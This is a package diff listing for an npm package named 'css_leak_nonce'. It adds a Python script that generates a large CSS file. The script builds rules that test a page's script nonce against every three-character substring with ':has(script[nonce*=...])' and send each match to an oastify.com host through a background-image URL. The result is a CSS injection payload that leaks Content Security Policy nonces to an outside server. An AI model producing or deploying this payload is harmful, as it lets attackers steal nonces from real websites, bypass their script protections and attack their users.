css_leak_nonce 1.0.0

Sign up to get free protection for your applications and to get access to all the features.
Files changed (3) hide show
  1. package/a.py +17 -0
  2. package/package.json +12 -0
  3. package/rules.css +46658 -0
package/a.py ADDED
@@ -0,0 +1,17 @@
1
+ import itertools
2
+
3
+ characters = "abcdefghijklmnopqrstuvwxyz0123456789"
4
+
5
+ permutations = itertools.product(characters, repeat=3)
6
+
7
+ strings = [''.join(perm) for perm in permutations]
8
+ rules = ""
9
+ trigger = "body{ background:"
10
+ for string in strings:
11
+ rules += f':has(script[nonce*="{string}"]){{--tosend-{string}: url(http://c3gvd9g0sph6rj4g5325c6lpdgj770vp.oastify.com?x={string});}}\n'
12
+ trigger += f'var(--tosend-{string}, none)'
13
+
14
+ trigger += "}"
15
+ with open("rules.css", "w+") as f:
16
+
17
+ f.write(rules + "\n" + trigger + "\n")
package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "css_leak_nonce",
3
+ "version": "1.0.0",
4
+ "main": "index.js",
5
+ "scripts": {
6
+ "test": "echo \"Error: no test specified\" && exit 1"
7
+ },
8
+ "keywords": [],
9
+ "author": "",
10
+ "license": "ISC",
11
+ "description": ""
12
+ }